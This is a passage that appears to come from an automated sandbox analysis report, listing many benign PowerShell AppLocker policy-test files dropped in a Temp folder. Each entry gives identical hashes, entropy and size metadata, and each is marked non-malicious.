                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zj3wcxv.wry.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5rghrl2z.cne.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amtspsok.2sp.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aorzzanq.pmm.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2jdev4v.nau.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bb35br4i.354.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_beynfad0.1iz.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bibuvaxc.kmj.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0teoxi4.mqk.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c40ucazh.qsj.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddktwung.10a.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnz1gn5e.pda.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ds5qdy41.fe4.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ea4rarul.440.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebgcehzc.wcb.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ekabln0z.au1.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_elim2vw3.ezc.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enlgwaiy.yko.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0s1nypa.p4b.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gnht5omm.tcm.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gxvwr15h.41g.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1ncb544.jbl.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3qjgm2x.eef.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ietvspca.tdi.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igjalqe0.cjk.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igwrpdqb.rbb.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iwuuc3bn.puv.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0s15j4o.v1t.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ja2zur1d.egz.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkd0eb10.pz2.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmyj2jfa.mif.ps1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
